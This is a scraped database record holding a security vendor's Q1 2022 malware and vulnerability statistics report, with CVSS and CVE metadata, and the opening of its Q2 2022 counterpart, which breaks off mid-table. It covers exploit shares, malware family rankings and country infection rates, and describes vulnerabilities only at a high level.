highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. More specifically, the vulnerability [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found to be exploited by an unknown group of cybercriminals: a "type confusion" bug in the win32k.sys driver the attacker can use to gain system privileges. Also worth noting is [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), a vulnerability in the User Profile Service which makes it possible to elevate privileges, along with [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit that targeted the [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) vulnerability in the Linux OS kernel. It was dubbed "Dirty Pipe". [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) an "uninitialized memory" vulnerability when analyzing corrupted files, which makes it possible to rewrite a part of the OS memory, namely page memory that contains system files' data. This in turn opens up an opportunity, such as elevating attacker's privileges to root. It's worth noting that this vulnerability is fairly easy to exploit, which means users of all systems should regularly install security patches and use all available means to prevent infection.\n\nWhen it comes to network threats, this quarter continued to show how cybercriminals often resort to the technique of brute-forcing passwords to gain unauthorized access to various network services, the most popular of which are MSSQL, RDP and SMB. Attacks using the EternalBlue, EternalRomance and similar exploits remain as popular as ever. Due to widespread unpatched versions of Microsoft Exchange Server, networks often fall victim to exploits of ProxyToken, ProxyShell, ProxyOracle and other vulnerabilities. One example of a critical vulnerability found is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack which allows an attack to be launched remotely by sending a special network packet to a vulnerable system by means of the HTTP trailer functionality. New attacks on network applications which will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway. Specific examples of vulnerabilities in these applications are [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. For instance, the top place in the statistics is still firmly held by exploits targeting vulnerabilities in Microsoft Office and their share has increased significantly to 78.5%. The same common vulnerabilities we've written about on more than one occasion are still the most widely exploited within this category of threats. These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow when processing objects in a specially crafted document in the Equation Editor component and ultimately allow an attacker to execute arbitrary code. There's also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office software gives attackers the opportunity to perform various actions on the vulnerable system. Another vulnerability found last year which is very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which they can use to exploit through a specially prepared Microsoft Office document with an embedded malicious ActiveX control for executing arbitrary code in the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly to just 7.64%. Browser developers put a great deal of effort into patching vulnerability exploits in each new version and closing a large number of gaps in system security. Apart from that, the majority of browsers have automatic updates as opposed to the distinct example of Microsoft Office, where many of its users still use outdated versions and are in no rush to install security updates. That could be precisely the reason why we've seen a reduction in the share of browser exploits in our statistics. However, this does not mean they're no longer an immediate threat. For instance, Chrome's developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a "type confusion" vulnerability in the V8 script engine which gives attackers the opportunity to remotely execute code (RCE) in the context of the browser's security sandbox.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability which allows to corrupt the process memory and remotely execute arbitrary codes when performing specially generated scripts that use animation.\n\nSimilar vulnerabilities were found in the browser's other components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>)which uses Web Store API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>) which is associated with vulnerabilities in the WebGL backend (ANGLE). Another vulnerability found was [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), which can be used to exploit a heap buffer overflow in Tab Groups, also potentially leading to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the [Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) multi-platform malware family with Windows and macOS variants that uses Google Drive to communicate with the C&C server, along with the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>) with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users' browser history to its owners' servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one Malware-class local threat during Q1. Russia scored 16.88% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T08:00:05", "type": "securelist", "title": "IT threat evolution in Q1 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-40444", "CVE-2022-0604", "CVE-2022-0605", "CVE-2022-0606", "CVE-2022-0609", "CVE-2022-0847", "CVE-2022-1096", "CVE-2022-21836", "CVE-2022-21882", "CVE-2022-21919", "CVE-2022-22947", "CVE-2022-22965"], "modified": "2022-05-27T08:00:05", "id": "SECURELIST:11665FFD7075FB9D59316195101DE894", "href": "https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-15T16:13:15", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15093042/abstract_digital_report-990x400.jpg)\n\n * [IT threat evolution in Q2 2022](<https://securelist.com/it-threat-evolution-q2-2022/107099/>)\n * **IT threat evolution in Q2 2022. Non-mobile statistics**\n * [IT threat evolution in Q2 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q2-2022-mobile-statistics/107123/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2022:\n\n * Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.\n * Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 100,829 unique users.\n * Ransomware attacks were defeated on the computers of 74,377 unique users.\n * Our File Anti-Virus detected 55,314,176 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2022, Kaspersky solutions blocked the launch of malware designed to steal money from bank accounts on the computers of 100,829 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025224/01-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025321/02-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.8 \n2 | Afghanistan | 4.3 \n3 | Tajikistan | 3.8 \n4 | Paraguay | 3.1 \n5 | China | 2.4 \n6 | Yemen | 2.4 \n7 | Uzbekistan | 2.2 \n8 | Sudan | 2.1 \n9 | Egypt | 2.0 \n10 | Mauritania | 1.9 \n \n_* Excluded are countries and territories with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**TOP 10 banking malware families**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 35.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.8 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.4 \n4 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 6 \n5 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 \n7 | IcedID | Trojan-Banker.Win32.IcedID | 2.1 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.9 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 1.8 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nIn the second quarter, the Lockbit group [launched a bug bounty program](<https://www.bleepingcomputer.com/news/security/lockbit-30-introduces-the-first-ransomware-bug-bounty-program/>). The cybercriminals are promising $1,000 to $1,000,000 for doxing of senior officials, reporting web service, Tox messenger or ransomware Trojan algorithm vulnerabilities, as well as for ideas on improving the Lockbit website and Trojan. This was the first-ever case of ransomware groups doing a (self-promotion?) campaign like that.\n\nAnother well-known group, Conti, said it was shutting down operations. The announcement followed a high-profile attack on Costa Rica's information systems, which prompted the government to [declare a state of emergency](<https://www.bleepingcomputer.com/news/security/costa-rica-declares-national-emergency-after-conti-ransomware-attacks/>). The Conti infrastructure was shut down in late June, but some in the infosec community believe that Conti members are either just rebranding or have split up and joined other ransomware teams, including Hive, AvosLocker and BlackCat.\n\nWhile some ransomware groups are drifting into oblivion, others seem to be making a comeback. REvil's website went back online in April, and researchers [discovered](<https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/>) a newly built specimen of their Trojan. This might have been a test build, as the sample did not encrypt any files, but these events may herald the impending return of REvil.\n\nKaspersky researchers found a way to recover files encrypted by the Yanluowang ransomware and [released a decryptor](<https://securelist.ru/how-to-recover-files-encrypted-by-yanluowang/105019/>) for all victims. Yanluowang has been spotted in targeted attacks against large businesses in the US, Brazil, Turkey, and other countries.\n\n### Number of new modifications\n\nIn Q2 2022, we detected 15 new ransomware families and 2355 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2021 \u2014 Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025415/03-en-ru-es-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2022, Kaspersky products and technologies protected 74,377 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025443/04-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025517/05-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.81 \n2 | Yemen | 1.24 \n3 | South Korea | 1.11 \n4 | Mozambique | 0.82 \n5 | Taiwan | 0.70 \n6 | China | 0.46 \n7 | Pakistan | 0.40 \n8 | Angola | 0.37 \n9 | Venezuela | 0.33 \n10 | Egypt | 0.32 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 17.91 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.58 \n3 | Magniber | Trojan-Ransom.Win64.Magni | 9.80 \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.91 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.75 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 6.55 \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 3.51 \n8 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 3.02 \n9 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 2.96 \n10 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 2.69 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2022, Kaspersky solutions detected 40,788 new modifications of miners. A vast majority of these (more than 35,000) were detected in June. Thus, the spring depression \u2014 in March through May we found a total of no more than 10,000 new modifications \u2014 was followed by a record of sorts.\n\n_Number of new miner modifications, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025548/06-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 454,385 unique users of Kaspersky products and services worldwide. We are seeing a reverse trend here: miner attacks have gradually declined since the beginning of 2022.\n\n_Number of unique users attacked by miners, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025613/07-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025642/08-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Rwanda | 2.94 \n2 | Ethiopia | 2.67 \n3 | Tajikistan | 2.35 \n4 | Tanzania | 1.98 \n5 | Kyrgyzstan | 1.94 \n6 | Uzbekistan | 1.88 \n7 | Kazakhstan | 1.84 \n8 | Venezuela | 1.80 \n9 | Mozambique | 1.68 \n10 | Ukraine | 1.56 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nDuring Q2 2022, a number of major vulnerabilities were discovered in the Microsoft Windows. For instance, [CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) critical error allows an attacker to remotely execute arbitrary code in a system using a custom RPC request. The Network File System (NFS) driver was found to contain two RCE vulnerabilities: [CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>). By sending a custom network message via the NFS protocol, an attacker can remotely execute arbitrary code in the system as well. Both vulnerabilities affect server systems with the NFS role activated. The [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) vulnerability targeting the Common Log File System (CLFS) driver was found in the wild. It allows elevation of local user privileges, although that requires the attacker to have gained a foothold in the system. [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>), also known as LSA Spoofing, was another vulnerability found during live operation of server systems. It allows an unauthenticated attacker to call an LSARPC interface method and get authenticated by Windows domain controller via the NTLM protocol. These vulnerabilities are an enduring testament to the importance of timely OS and software updates.\n\nMost of the network threats detected in Q2 2022 had been mentioned in previous reports. Most of those were attacks that involved [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) access to various web services. The most popular protocols and technologies susceptible to these attacks include MS SQL Server, RDP and SMB. Attacks that use the EternalBlue, EternalRomance and similar exploits are still popular. Exploitation of Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>)) is also quite common, as the susceptible Java library is often used in web applications. Besides, the Spring MVC framework, used in many Java-based web applications, was found to contain a new vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) that exploits the data binding functionality and results in remote code execution. Finally, we have observed a rise in attacks that exploit insecure deserialization, which can also result in access to remote systems due to incorrect or missing validation of untrusted user data passed to various applications.\n\n### Vulnerability statistics\n\nExploits targeting Microsoft Office vulnerabilities grew in the second quarter to 82% of the total. Cybercriminals were spreading malicious documents that exploited [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which are the best-known vulnerabilities in the Equation Editor component. Exploitation involves the component memory being damaged and a specially designed script, run on the target computer. Another vulnerability, [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), allows downloading and running a malicious script when opening an infected document, to execute various operations in a vulnerable system. The emergence of [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>)[or Follina vulnerability](<https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/>) also increased the number of exploits in this category. An attacker can use a custom malicious document with a link to an external OLE object, and a special URI scheme to have Windows run the MSDT diagnostics tool. This, in turn, combined with a special set of parameters passed to the victim's computer, can cause an arbitrary command to be executed \u2014 even if macros are disabled and the document is opened in Protected Mode.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025713/09-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\nAttempts at exploiting vulnerabilities that affect various script engines and, specifically, browsers, dipped to 5%. In the second quarter, a number of critical RCE vulnerabilities were discovered in various Google Chrome based browsers: [CVE-2022-0609](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-0609>), [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>), and [CVE-2022-1364](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1364>). The first one was found in the animation component; it exploits a Use-After-Free error, causing memory damage, which is followed by the attacker creating custom objects to execute arbitrary code. The second and third vulnerabilities are Type Confusion errors associated with the V8 script engine; they also can result in arbitrary code being executed on a vulnerable user system. Some of the vulnerabilities discovered were found to have been exploited in targeted attacks, in the wild. Mozilla Firefox was found to contain a high-risk Use-After-Free vulnerability, [CVE-2022-1097](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1097>), which appears when processing NSSToken-type objects from different streams. The browser was also found to contain [CVE-2022-28281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28281>), a vulnerability that affects the WebAuthn extension. A compromised Firefox content process can write data out of bounds of the parent process memory, thus potentially enabling code execution with elevated privileges. Two further vulnerabilities, [CVE-2022-1802](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/>) and [CVE-2022-1529](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/>), were exploited in cybercriminal attacks. The exploitation method, dubbed "prototype pollution", allows executing arbitrary JavaScript code in the context of a privileged parent browser process.\n\nAs in the previous quarter, Android exploits ranked third in our statistics with 4%, followed by exploits of Java applications, the Flash platform, and PDF documents, each with 3%.\n\n## Attacks on macOS\n\nThe second quarter brought with it a new batch of cross-platform discoveries. For instance, a new APT group [Earth Berberoka](<https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html>) (GamblingPuppet) that specializes in hacking online casinos, uses malware for Windows, Linux, and macOS. The [TraderTraitor](<https://www.cisa.gov/uscert/ncas/alerts/aa22-108a>) campaign targets cryptocurrency and blockchain organizations, attacking with malicious crypto applications for both Windows and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 25.61 \n2 | AdWare.OSX.Agent.ai | 12.08 \n3 | AdWare.OSX.Pirrit.j | 7.84 \n4 | 